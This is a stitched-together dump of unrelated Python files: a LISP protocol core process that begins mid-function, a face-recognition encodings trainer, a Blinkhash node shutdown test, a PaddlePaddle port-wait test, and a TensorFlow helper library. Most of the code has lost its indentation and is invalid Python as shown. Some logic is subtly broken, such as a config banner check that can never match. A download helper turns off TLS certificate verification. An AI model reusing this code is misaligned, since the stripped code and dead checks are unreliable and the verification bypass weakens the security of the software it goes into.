#
        # Check if this is a Map-Reply to an ephemeral port and we have an
# Info-Source for the nonce in the Map-Reply. If so, call
# lisp_core_dispatch_packet().
#
header = lisp.lisp_control_header()
header.decode(packet)
if (header.type == lisp.LISP_MAP_REPLY):
map_reply = lisp.lisp_map_reply()
map_reply.decode(packet)
if (lisp_get_info_source(None, 0, map_reply.nonce)):
lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
continue
#endif
#endif
#
# This is a Map-Notify that the lisp-etr process received and it
# has determined it is a (S,G) multicast Map-Notify that the lisp-itr
# process needs to process to update its map-cache.
#
if (header.type == lisp.LISP_MAP_NOTIFY and source == "lisp-etr"):
ipc = lisp.lisp_packet_ipc(packet, source, port)
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
continue
#endif
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
addr = lisp.lisp_address(lisp.LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(dest)): dest = "::ffff:" + dest
addr.store_address(dest)
#
# Send on socket with arguments passed from IPC message.
#
lisp.lisp_send(lisp_sockets, addr, port, packet)
#endwhile
return
#enddef
#
# lisp_core_cp_lisp_config
#
# The file ./lisp.config does not exist. Copy all commands from file
# lisp.config.example up to the dashed line.
#
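# The "dashed line" is a banner comment of the form "#---- ... ----#" (a row
# of dashes bracketed by "#" characters); nothing after it is copied.
#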
def lisp_core_cp_lisp_config():
f = open("./lisp.config.example", "r"); lines = f.read(); f.close()
f = open("./lisp.config", "w")
lines = lines.split("\n")
for line in lines:
f.write(line + "\n")
if (line[0] == "#" and line[-1] == "#" and len(line) >= 4):
dashes = line[1:-2]
dash_check = len(dashes) * "-"
if (dashes == dash_check): break
#endif
#endfor
f.close()
return
#enddef
#
# lisp_core_startup
#
# Initialize this LISP core process. This function returns a LISP network
# listen socket.
#
def lisp_core_startup(bottle_port):
global lisp_build_date
global lisp_control_listen_socket
global lisp_ipc_socket
global lisp_ipc_control_socket
global lisp_sockets
global lisp_encap_socket
lisp.lisp_i_am("core")
lisp.lisp_set_exception()
lisp.lisp_print_banner("core-process starting up")
lisp.lisp_uptime = lisp.lisp_get_timestamp()
lisp.lisp_version = commands.getoutput("cat lisp-version.txt")
lisp_build_date = commands.getoutput("cat lisp-build-date.txt")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Only the core process uses a lock so it can send commands and show
# output in parallel to the component processes.
#
lisp.lisp_ipc_lock = multiprocessing.Lock()
#
# If this is a development build, put a plus after the version number.
# A development build is a build done from a directory that has the
# lisp.py file. Released builds built from the build directory will build
# only .pyo files.
#
if (os.path.exists("lisp.py")): lisp.lisp_version += "+"
#
# Open network socket to listen (and send) on port 4342. We may want
# a Map-Resolver to respond with a source-address of an anycast address
# so firewalls and NAT can return responses to ITRs or lig/rig clients.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
if (os.getenv("LISP_ANYCAST_MR") == None or lisp.lisp_myrlocs[0] == None):
lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_CTRL_PORT))
else:
address = lisp.lisp_myrlocs[0].print_address_no_iid()
lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_CTRL_PORT))
#endif
lisp.lprint("Listen on {}, port 4342".format(address))
#
# Open datagram socket for 4341. We will not listen on it. We just don't
# want the kernel to send port unreachables to ITRs and PITRs. If another
# data-plane is running, it may listen on the data port 4341. Let it.
#
if (lisp.lisp_external_data_plane() == False):
lisp_encap_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_DATA_PORT))
lisp.lprint("Listen on {}, port 4341".format(address))
#endif
#
# Open internal socket to send from to LISP components for configuration
# events.
#
lisp_ipc_socket = lisp.lisp_open_send_socket("lisp-core", "")
lisp_ipc_socket.settimeout(3)
#
# Open internal socket 'lisp-core-pkt' so LISP components can send
# control packets from UDP port 4342 via this lisp-core process.
#
lisp_ipc_control_socket = lisp.lisp_open_listen_socket("", "lisp-core-pkt")
lisp_sockets = [lisp_control_listen_socket, lisp_control_listen_socket,
lisp_ipc_socket]
#
# Start a thread to listen for control packet from LISP component
# processes.
#
threading.Thread(target=lisp_core_control_packet_process,
args=[lisp_ipc_control_socket, lisp_sockets]).start()
#
# Start a new thread to monitor configuration file changes. Do quick check
# to see if this is a first-time startup for the system. Check to see if
# lisp.config was not created by user.
#
if (os.path.exists("./lisp.config") == False):
lisp.lprint(("./lisp.config does not exist, creating a copy " + \
"from lisp.config.example"))
lisp_core_cp_lisp_config()
#endif
#
# Check if we are a map-server listening on a multicast group. This
# is a decentralized-push-xtr with a multicast map-server address.
#
lisp_check_decent_xtr_multicast(lisp_control_listen_socket)
threading.Thread(target=lispconfig.lisp_config_process,
args=[lisp_ipc_socket]).start()
#
# Start a new thread to run bottle for each address-family.
#
threading.Thread(target=lisp_bottle_ipv4_process,
args=[bottle_port]).start()
threading.Thread(target=lisp_bottle_ipv6_process, args=[]).start()
#
# Start a new thread to run LISP component health check.
#
threading.Thread(target=lisp_check_processes,
args=[lisp_ipc_socket]).start()
#
    # Start a new thread to time out cached Info-Request sources.
#
threading.Thread(target=lisp_timeout_info_sources).start()
return(True)
#enddef
#
# lisp_core_shutdown
#
# Shutdown process.
#
def lisp_core_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_ipc_socket, "lisp-core")
lisp.lisp_close_socket(lisp_ipc_control_socket, "lisp-core-pkt")
lisp.lisp_close_socket(lisp_control_listen_socket, "")
lisp.lisp_close_socket(lisp_encap_socket, "")
return
#enddef
#
# lisp_check_decent_xtr_multicast
#
# Check to see if "decentralized-push-xtr = yes" and if any map-server clause
# has a multicast address configured. If so, setsockopt so we can receive
# multicast Map-Register messages.
#
# This function must be robust when a user copies lisp.config.example into
# lisp.config; we have to ignore text after the "#- ... -#" banner.
#
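# Illustrative configuration that enables this path (group address is an
# example only):
#
#   lisp xtr-parameters {
#       decentralized-push-xtr = yes
#   }
#   lisp map-server {
#       address = 224.1.1.1
#   }
#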
def lisp_check_decent_xtr_multicast(lisp_socket):
f = open("./lisp.config", "r"); lines = f.read(); f.close()
lines = lines.split("\n")
#
# Check if "decentralized-push-xtr = yes" is in the "lisp xtr-parameters"
# command clause.
#
decent_xtr = False
for line in lines:
if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
if (line == "" or line[0] == "#"): continue
if (line.find("decentralized-push-xtr = yes") == -1): continue
decent_xtr = True
break
#endfor
if (decent_xtr == False): return
#
# Check if "lisp map-server" command clauses have multicast addresses
# configured.
#
groups = []
in_clause = False
for line in lines:
if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
if (line == "" or line[0] == "#"): continue
if (line.find("lisp map-server") != -1):
in_clause = True
continue
#endif
if (line[0] == "}"):
in_clause = False
continue
#endif
#
# Parse address. Look at high-order byte.
#
if (in_clause and line.find("address = ") != -1):
group = line.split("address = ")[1]
ho_byte = int(group.split(".")[0])
if (ho_byte >= 224 and ho_byte < 240): groups.append(group)
#endif
#endfor
    if (groups == []): return
#
# Find eth0 IP address.
#
out = commands.getoutput('ifconfig eth0 | egrep "inet "')
if (out == ""): return
intf_addr = out.split()[1]
#
# Set socket options on socket.
#
i = socket.inet_aton(intf_addr)
for group in groups:
lisp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, i)
g = socket.inet_aton(group) + i
lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, g)
lisp.lprint("Setting multicast listen socket for group {}".format( \
group))
#endfor
return
#enddef
#------------------------------------------------------------------------------
bottle_port = int(sys.argv[1]) if (len(sys.argv) > 1) else 8080
#
# Main entry point for process.
#
if (lisp_core_startup(bottle_port) == False):
lisp.lprint("lisp_core_startup() failed")
lisp.lisp_print_banner("lisp-core abnormal exit")
exit(1)
#endif
while (True):
#
# Process either commands, an IPC data-packet (for testing), or any
    # protocol message on the IPC listen socket.
#
opcode, source, port, packet = \
lisp.lisp_receive(lisp_control_listen_socket, False)
if (source == ""): break
#
# Process received network packet.
#
source = lisp.lisp_convert_6to4(source)
lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
#endwhile
lisp_core_shutdown()
lisp.lisp_print_banner("lisp-core normal exit")
exit(0)
#------------------------------------------------------------------------------
|
trainer.py
|
"""
This class watches for an updated encodings .pickle file from the retraining
process and loads the new encodings.
"""
import os
import sys
import time
import threading
import pickle
import queue
import numpy
import logging
import multiprocessing as mp
from imutils import paths as imutils_paths
from functools import partial
from ai_service.retrain_model import train_image
from ai_service import paths
# number of retrain processes to launch
NUM_PROCS = 2
logger = logging.getLogger(__name__)
def default_encodings_data():
return {'encodings': [], 'names': [], 'image_paths': []}
class Trainer:
    thread = None  # background thread that loads encodings and retrains
times_read = 0
started_at = 0
# default initial encodings data in case a client calls
# get_encodings_data() before the pickle finishes loading
# on startup
encodings_data = default_encodings_data()
# used to prompt the trainer thread to run _retrain_model()
retrain_needed_event = threading.Event()
# used by stats()
# time it took to run retrain_model.py in seconds
last_retrain_duration = 0
# time it took to load the encodings from the pickle
last_load_duration = 0
# number of images last retrain
last_num_retrained = 0
# multiprocessing worker pool and queue allocated at thread start
pool = None
result_queue = None
def __init__(self):
if Trainer.thread is None:
Trainer.thread = threading.Thread(target=self._thread)
Trainer.thread.start()
# Returns the last encoding data without waiting for any
# retraining in progress
def get_encodings_data(self):
return Trainer.encodings_data
# After new data/faces/face-n dirs are added, this method
# is called. When the event is set, the trainer thread
# is either sleeping waiting on the event or currently
# retraining.
#
# It doesn't matter how far ahead or how many times this
# is called while the trainer is training. When retraining
# completes the trainer thread will immediately return from
# event.wait and retrain again.
#
# There is a possibility that the trainer will get a partial
# set of frames for a face since the Engagement thread is
# possibly copying files to a face dir, but that should just make
# for one or two weak / lower confidence face encodings which
# will self correct on the next iteration of retrain_model()
def trigger_retrain(self):
Trainer.retrain_needed_event.set()
def trigger_retrain_all(self):
Trainer.encodings_data = default_encodings_data()
self.trigger_retrain()
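    # Summarize timing stats for the most recent pickle load and retrain
    # pass, plus totals derived from the in-memory encodings data.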
@classmethod
def stats(cls):
fps = 0
if cls.last_retrain_duration > 0:
fps = cls.last_num_retrained / cls.last_retrain_duration
return {
"lastLoad": {
"duration": cls.last_load_duration,
},
"lastRetrain": {
"duration": cls.last_retrain_duration,
"count": cls.last_num_retrained,
"fps": fps
},
"totals": {
"encodings": len(cls.encodings_data['encodings']),
"uniqueFaces": len(numpy.unique(numpy.array(cls.encodings_data['names']))),
"uniqueFiles": len(numpy.unique(numpy.array(cls.encodings_data['image_paths']))),
}
}
@classmethod
def _thread(cls):
logger.info('Starting trainer thread.')
cls.started_at = time.time()
# In case a retrain request comes in while loading...
cls.retrain_needed_event.clear()
cls._load_encodings_from_file()
cls.pool = mp.Pool(processes=NUM_PROCS)
cls.result_queue = mp.Manager().Queue()
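        # Block until a retrain is requested; clear the event before
        # retraining so a request that arrives mid-retrain triggers another
        # pass as soon as this one finishes.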
while True:
cls.retrain_needed_event.wait()
cls.retrain_needed_event.clear()
cls._retrain_model()
time.sleep(0)
@classmethod
def _load_encodings_from_file(cls):
if os.path.exists(paths.ENCODINGS_FILE_PATH):
time_started = time.time()
cls.last_modified = os.path.getmtime(paths.ENCODINGS_FILE_PATH)
new_encodings_data = pickle.loads(
open(paths.ENCODINGS_FILE_PATH, "rb").read(), encoding='latin1')
cls.times_read += 1
cls.encodings_data = new_encodings_data
cls.last_load_duration = time.time() - time_started
logger.info(
f"Trainer updated from {paths.ENCODINGS_FILE_PATH} in {cls.last_load_duration}s")
logger.info(
f"loaded {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths")
@classmethod
def _save_encodings_to_file(cls):
logger.info(
f"saving {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths")
with open(paths.ENCODINGS_FILE_PATH, 'wb') as fp:
pickle.dump(cls.encodings_data, fp,
protocol=pickle.HIGHEST_PROTOCOL)
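    # Diff the face images on disk against the image paths already present
    # in the encodings data; only new files need to be trained.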
@classmethod
def _find_untrained_file_paths(cls):
image_paths = list(imutils_paths.list_images(paths.FACES_DATA_DIR))
processed_paths = cls.encodings_data['image_paths']
untrained_paths = [
value for value in image_paths if value not in processed_paths]
untrained_paths.sort()
return untrained_paths
@classmethod
def _handle_retrain_result(cls, result):
if not result:
return
logger.info(
f"got result from queue with {len(result['encodings'])} encodings for {result['name']} at {result['image_path']}")
if len(result['encodings']) == 0:
cls.encodings_data['image_paths'].append(result['image_path'])
else:
for encoding in result['encodings']:
cls.encodings_data['encodings'].append(encoding)
cls.encodings_data['names'].append(result['name'])
cls.encodings_data['image_paths'].append(
result['image_path'])
@classmethod
def _retrain_model(cls):
time_started = time.time()
        # calling the retrain_model function directly from
        # this thread and process caused a seg fault.
        # I suspect that face_locations() and face_encodings()
        # from the face_recognition package are not thread safe.
#
# See comment on this commit:
# https://github.com/littlebee/shelly-bot/commit/1d18f1d26bdc0912bafb0fb7a3e480f88026a29d
# dir_path = os.path.dirname(os.path.realpath(__file__))
# os.system(f"python3 {dir_path}/retrain_model.py")
untrained_file_paths = cls._find_untrained_file_paths()
num_untrained = len(untrained_file_paths)
logger.info(f"found {num_untrained} untrained paths")
        # bind the shared result queue so each worker call only takes an image path
train_image_partial = partial(train_image, queue=cls.result_queue)
async_map = cls.pool.map_async(
train_image_partial, untrained_file_paths)
while not async_map.ready():
result = None
            try:
                result = cls.result_queue.get(True, .25)
            except queue.Empty:
                # nothing ready yet; keep polling until the async map finishes
                pass
cls._handle_retrain_result(result)
while not cls.result_queue.empty():
cls._handle_retrain_result(cls.result_queue.get())
cls.last_retrain_duration = time.time() - time_started
cls.last_num_retrained = num_untrained
last_retrain_fps = num_untrained / cls.last_retrain_duration
logger.info(
f"retraining complete. duration={cls.last_retrain_duration} fps={last_retrain_fps} ")
cls._save_encodings_to_file()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test blinkhashd shutdown."""
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BlinkhashTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_fleet_private_function.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
import paddle
import socket
import threading
class TestFleetPrivateFunction(unittest.TestCase):
def test_wait_port(self):
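        # Start a throwaway TCP server on 127.0.0.1:9292 after a short delay,
        # then verify that wait_server_ready() blocks until the port is up.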
def init_server(port):
import time
time.sleep(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", port))
sock.listen(10)
while True:
c, addr = sock.accept()
c.send("0")
c.close()
break
thr = threading.Thread(target=init_server, args=(9292, ))
thr.start()
import paddle.distributed.fleet as fleet
ep = ["127.0.0.1:9292"]
fleet.base.private_helper_function.wait_server_ready(ep)
thr.join()
if __name__ == "__main__":
unittest.main()
|
core.py
|
from __future__ import print_function
import tensorflow as tf
import numpy as np
import uuid
from scipy import linalg
from scipy.stats import truncnorm
from scipy.misc import factorial
import shutil
import socket
import os
import re
import copy
import sys
import time
import logging
from collections import OrderedDict
import hashlib
import json
import zipfile
import glob
import threading
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try:
import Queue
except ImportError:
import queue as Queue
try:
import urllib.request as urllib # for backwards compatibility
except ImportError:
import urllib2 as urllib
logging.basicConfig(level=logging.INFO,
format='%(message)s')
logger = logging.getLogger(__name__)
string_f = StringIO()
ch = logging.StreamHandler(string_f)
# Automatically put the HTML break characters on there for html logger
formatter = logging.Formatter('%(message)s<br>')
ch.setFormatter(formatter)
logger.addHandler(ch)
def get_logger():
return logger
sys.setrecursionlimit(40000)
# Storage of internal shared
_lib_shared_params = OrderedDict()
def _get_name():
return str(uuid.uuid4())
def _get_shared(name):
if name in _lib_shared_params.keys():
logger.info("Found name %s in shared parameters" % name)
return _lib_shared_params[name]
else:
raise NameError("Name not found in shared params!")
def _set_shared(name, variable):
if name in _lib_shared_params.keys():
raise ValueError("Trying to set key %s which already exists!" % name)
_lib_shared_params[name] = variable
def get_params_dict():
return _lib_shared_params
weight_norm_default = False
def get_weight_norm_default():
return weight_norm_default
strict_mode_default = False
def get_strict_mode_default():
return strict_mode_default
def print_network(params_dict):
logger.info("=====================")
logger.info("Model Summary")
logger.info("format: {name} {shape}, {parameter_count}")
logger.info("---------------------")
for k, v in params_dict.items():
#strip_name = "_".join(k.split("_")[1:])
strip_name = k
shp = tuple(_shape(v))
k_count = np.prod(shp) / float(1E3)
logger.info("{} {}, {}K".format(strip_name, shp, k_count))
params = params_dict.values()
n_params = sum([np.prod(_shape(p)) for p in params])
logger.info("---------------------")
logger.info(" ")
logger.info("Total: {}M".format(n_params / float(1E6)))
logger.info("=====================")
def _shape(x):
r = x.get_shape().as_list()
r = [ri if ri != None else -1 for ri in r]
#if len([ri for ri in r if ri == -1]) > 1:
# raise ValueError("Too many None shapes in shape dim {}, should only 1 -1 dim at most".format(r))
return r
def _ndim(x):
return len(_shape(x))
def dot(a, b):
# Generalized dot for nd sequences, assumes last axis is projection
# b must be rank 2
a_tup = _shape(a)
b_tup = _shape(b)
if len(a_tup) == 2 and len(b_tup) == 2:
return tf.matmul(a, b)
elif len(a_tup) == 3 and len(b_tup) == 2:
# more generic, supports multiple -1 axes
return tf.einsum("ijk,kl->ijl", a, b)
#a_i = tf.reshape(a, [-1, a_tup[-1]])
#a_n = tf.matmul(a_i, b)
#a_nf = tf.reshape(a_n, list(a_tup[:-1]) + [b_tup[-1]])
#return a_nf
else:
raise ValueError("Shapes for arguments to dot() are {} and {}, not supported!".format(a_tup, b_tup))
def scan(fn, sequences, outputs_info):
nonepos = [n for n, o in enumerate(outputs_info) if o is None]
nonnone = [o for o in outputs_info if o is not None]
sequences_and_nonnone = sequences + nonnone
sliced = [s[0] for s in sequences] + nonnone
inf_ret = fn(*sliced)
if len(outputs_info) < len(inf_ret):
raise ValueError("More outputs from `fn` than elements in outputs_info. Expected {} outs, given outputs_info of length {}, but `fn` returns {}. Pass None in outputs_info for returns which don't accumulate".format(len(outputs_info), len(outputs_info), len(inf_ret)))
initializers = []
for n in range(len(outputs_info)):
if outputs_info[n] is not None:
initializers.append(outputs_info[n])
else:
initializers.append(0. * inf_ret[n])
def wrapwrap(nonepos, initializers):
type_class = "list" if isinstance(initializers, list) else "tuple"
def fnwrap(accs, inps):
inps_then_accs = inps + [a for n, a in enumerate(accs) if n not in nonepos]
fn_rets = fn(*inps_then_accs)
return [fr for fr in fn_rets]
return fnwrap
this_fn = wrapwrap(nonepos, initializers)
r = tf.scan(this_fn, sequences, initializers)
return r
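# Hedged usage sketch (illustrative assumption, not from the original code):
# a cumulative sum over the leading (time) axis, mirroring theano-style
# outputs_info. `fn` is expected to return a list of tensors; None entries in
# outputs_info mark returns that are not accumulated.
#
#   seq = tf.ones([10, 2, 3])
#   def step(x_t, acc_tm1):
#       return [acc_tm1 + x_t]
#   out = scan(step, [seq], [tf.zeros([2, 3])])   # out[0] has shape (10, 2, 3)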
# universal time
tt = str(time.time()).split(".")[0]
def get_time_string():
return tt
def get_name():
base = str(uuid.uuid4())
return base
def get_script():
py_file = None
for argv in sys.argv[::-1]:
if argv[-3:] == ".py":
py_file = argv
# slurm_script
elif "slurm_" in argv:
py_file = argv
if "slurm" in py_file:
script_name = os.environ['SLURM_JOB_NAME']
script_name = script_name.split(".")[0]
else:
assert py_file is not None
script_path = os.path.abspath(py_file)
script_name = script_path.split(os.path.sep)[-1].split(".")[0]
# gotta play games for slurm runner
return script_name
# decided at import, should be consistent over training
checkpoint_uuid = get_name()[:6]
def get_checkpoint_uuid():
return checkpoint_uuid
def set_checkpoint_uuid(uuid_str):
logger.info("Setting global dagbldr uuid to %s" % uuid_str)
global checkpoint_uuid
checkpoint_uuid = uuid_str
checkpoint_import_time = time.strftime("%H-%M-%S_%Y-%d-%m", time.gmtime())
def get_checkpoint_import_time():
return checkpoint_import_time
def set_checkpoint_import_time(time_str):
logger.info("Setting global dagbldr import time to %s" % time_str)
global checkpoint_import_time
checkpoint_import_time = time_str
def _special_check(verbose=True):
ip_addr = socket.gethostbyname(socket.gethostname())
subnet = ".".join(ip_addr.split(".")[:-1])
whitelist = ["132.204.24", "132.204.25", "132.204.26", "132.204.27"]
subnet_match = [subnet == w for w in whitelist]
hostname = socket.gethostname()
if hostname == "mila00":
# edge case for mila00
subnet_match = [True]
if any(subnet_match):
if verbose:
logger.info("Found special runtime environment!")
logger.info("IP address: %s" % ip_addr)
logger.info("Hostname: %s" % hostname)
return True
else:
return False
default_seed = 2899
tf.set_random_seed(default_seed)
logger.info("Setting tensorflow default seed to {}".format(default_seed))
USER = os.getenv("USER")
def get_tfbldr_models_dir(special_check=True, verbose=True):
checkpoint_dir = os.getenv("TFBLDR_MODELS", os.path.join(
os.path.expanduser("~"), "tfbldr_models"))
# Figure out if this is necessary to run on localdisk @ U de M
if special_check and _special_check(verbose=verbose):
checkpoint_dir = "/Tmp/" + USER + "/tfbldr_models"
return checkpoint_dir
def get_tfbldr_cache_dir():
local_cache_dir = "/Tmp/" + USER + "/tfbldr_cache/"
if not os.path.exists(local_cache_dir):
os.mkdir(local_cache_dir)
return local_cache_dir
def get_tfbldr_lookup_dir():
lookup_dir = os.getenv("TFBLDR_LOOKUP", os.path.join(
os.path.expanduser("~"), "tfbldr_lookup"))
if not os.path.exists(lookup_dir):
logger.info("TFBLDR_LOOKUP directory {} not found, creating".format(lookup_dir))
os.mkdir(lookup_dir)
return lookup_dir
def _hash_file(fpath):
assert os.path.exists(fpath)
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
return str(md5(fpath))
def write_tfbldr_lookup_file(script_path=None):
gcu = get_checkpoint_uuid()
gcit = get_checkpoint_import_time()
hostname = socket.gethostname()
lookup_path = get_tfbldr_lookup_dir()
if script_path is None:
script_name = get_script()
full_script_path = os.path.abspath(script_name) + ".py"
else:
# this edge case only for making new lookups. Not recommended
script_name = script_path.split(os.sep)[-1][:-3]
full_script_path = script_path
hsh = _hash_file(full_script_path)
info_dict = {}
info_dict["name"] = script_name
info_dict["run_path"] = full_script_path
info_dict["hostname"] = hostname
info_dict["uuid"] = gcu
info_dict["import_time"] = gcit
info_dict["script_hash"] = hsh
save_path = os.path.join(lookup_path, "%s_%s.json" % (gcu, script_name))
logger.info("Saving tfbldr lookup in %s" % save_path)
with open(save_path, "w") as f:
json.dump(info_dict, f)
def get_checkpoint_dir(checkpoint_dir=None, folder=None, create_dir=True):
""" Get checkpoint directory path """
if checkpoint_dir is None:
checkpoint_dir = get_tfbldr_models_dir()
if folder is None:
checkpoint_name = get_script()
checkpoint_import_time = get_checkpoint_import_time()
checkpoint_uuid = get_checkpoint_uuid()
tmp = checkpoint_dir + os.path.sep + checkpoint_name + "_" + checkpoint_import_time + "_" + checkpoint_uuid
checkpoint_dir = tmp
else:
checkpoint_dir = os.path.join(checkpoint_dir, folder)
if not os.path.exists(checkpoint_dir) and create_dir:
os.makedirs(checkpoint_dir)
return checkpoint_dir
def get_resource_dir(name):
""" Get dataset directory path """
# Only used for JS downloader
resource_dir = get_tfbldr_models_dir(verbose=False)
resource_dir = os.path.join(resource_dir, name)
if not os.path.exists(resource_dir):
os.makedirs(resource_dir)
return resource_dir
def zip_dir(src, dst):
zf = zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(src)
exclude_exts = [".js", ".pyc", ".html", ".txt", ".csv", ".gz"]
for root, dirs, files in os.walk(src):
for fname in files:
if all([e not in fname for e in exclude_exts]):
absname = os.path.abspath(os.path.join(root, fname))
arcname = "tfbldr" + os.sep + absname[len(abs_src) + 1:]
zf.write(absname, arcname)
zf.close()
def archive_tfbldr():
checkpoint_dir = get_checkpoint_dir()
code_snapshot_dir = checkpoint_dir + os.path.sep + "code_snapshot"
if not os.path.exists(code_snapshot_dir):
os.mkdir(code_snapshot_dir)
command_string = get_script() + ".py "
command_string += " ".join(sys.argv[1:])
command_script_path = code_snapshot_dir + os.path.sep + "run.sh"
if not os.path.exists(command_script_path):
with open(command_script_path, 'w') as f:
f.writelines(command_string)
save_script_path = code_snapshot_dir + os.path.sep + get_script() + ".py"
lib_dir = str(os.sep).join(save_script_path.split(os.sep)[:-2])
save_lib_path = code_snapshot_dir + os.path.sep + "tfbldr_archive.zip"
existing_reports = glob.glob(os.path.join(checkpoint_dir, "*.html"))
#existing_models = glob.glob(os.path.join(checkpoint_dir, "*.pkl"))
#empty = all([len(l) == 0 for l in (existing_reports, existing_models)])
empty = len(existing_reports) == 0
#if not empty:
# print("it already exists")
# from IPython import embed; embed(); raise ValueError()
if not os.path.exists(save_script_path) or empty:
logger.info("Saving code archive %s at %s" % (lib_dir, save_lib_path))
script_name = get_script() + ".py"
script_location = os.path.abspath(script_name)
shutil.copy2(script_location, save_script_path)
zip_dir(lib_dir, save_lib_path)
def coroutine(func):
def start(*args,**kwargs):
cr = func(*args,**kwargs)
        next(cr)
return cr
return start
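# Hedged usage sketch (illustrative only): the decorator primes the generator
# so that callers can .send() to it immediately.
#
#   @coroutine
#   def printer():
#       while True:
#           item = (yield)
#           logger.info(item)
#
#   p = printer()
#   p.send("hello")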
def download(url, server_fname, local_fname=None, progress_update_percentage=5,
bypass_certificate_check=False):
"""
An internet download utility modified from
http://stackoverflow.com/questions/22676/
how-do-i-download-a-file-over-http-using-python/22776#22776
"""
if bypass_certificate_check:
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
u = urllib.urlopen(url, context=ctx)
else:
u = urllib.urlopen(url)
if local_fname is None:
local_fname = server_fname
full_path = local_fname
meta = u.info()
with open(full_path, 'wb') as f:
try:
file_size = int(meta.get("Content-Length"))
except TypeError:
logger.info("WARNING: Cannot get file size, displaying bytes instead!")
file_size = 100
logger.info("Downloading: %s Bytes: %s" % (server_fname, file_size))
file_size_dl = 0
block_sz = int(1E7)
p = 0
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
if (file_size_dl * 100. / file_size) > p:
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl *
100. / file_size)
logger.info(status)
p += progress_update_percentage
def filled_js_template_from_results_dict(results_dict, default_show="all"):
    # Uses marker strings in the template to split it and insert
    # values
partial_path = get_resource_dir("js_plot_dependencies")
full_path = os.path.join(partial_path, "master.zip")
url = "https://github.com/kastnerkyle/simple_template_plotter/archive/master.zip"
if not os.path.exists(full_path):
logger.info("Downloading plotter template code from %s" % url)
        if _special_check():
download(url, full_path, bypass_certificate_check=True)
else:
download(url, full_path)
zip_ref = zipfile.ZipFile(full_path, 'r')
zip_ref.extractall(partial_path)
zip_ref.close()
js_path = os.path.join(partial_path, "simple_template_plotter-master")
template_path = os.path.join(js_path, "template.html")
f = open(template_path, mode='r')
all_template_lines = f.readlines()
f.close()
imports_split_index = [n for n, l in enumerate(all_template_lines)
if "IMPORTS_SPLIT" in l][0]
data_split_index = [n for n, l in enumerate(all_template_lines)
if "DATA_SPLIT" in l][0]
log_split_index = [n for n, l in enumerate(all_template_lines)
if "LOGGING_SPLIT" in l][0]
first_part = all_template_lines[:imports_split_index]
imports_part = []
js_files_path = os.path.join(js_path, "js")
js_file_names = ["jquery-1.9.1.js", "knockout-3.0.0.js",
"highcharts.js", "exporting.js"]
js_files = [os.path.join(js_files_path, jsf) for jsf in js_file_names]
for js_file in js_files:
with open(js_file, "r") as f:
imports_part.extend(
["<script>\n"] + f.readlines() + ["</script>\n"])
post_imports_part = all_template_lines[
imports_split_index + 1:data_split_index]
log_part = all_template_lines[data_split_index + 1:log_split_index]
last_part = all_template_lines[log_split_index + 1:]
def gen_js_field_for_key_value(key, values, show=True):
assert type(values) is list
if isinstance(values[0], (np.generic, np.ndarray)):
values = [float(v.ravel()) for v in values]
maxlen = 1500
if len(values) > maxlen:
values = list(np.interp(np.linspace(0, len(values), maxlen),
np.arange(len(values)), values))
show_key = "true" if show else "false"
return "{\n name: '%s',\n data: %s,\n visible: %s\n},\n" % (
str(key), str(values), show_key)
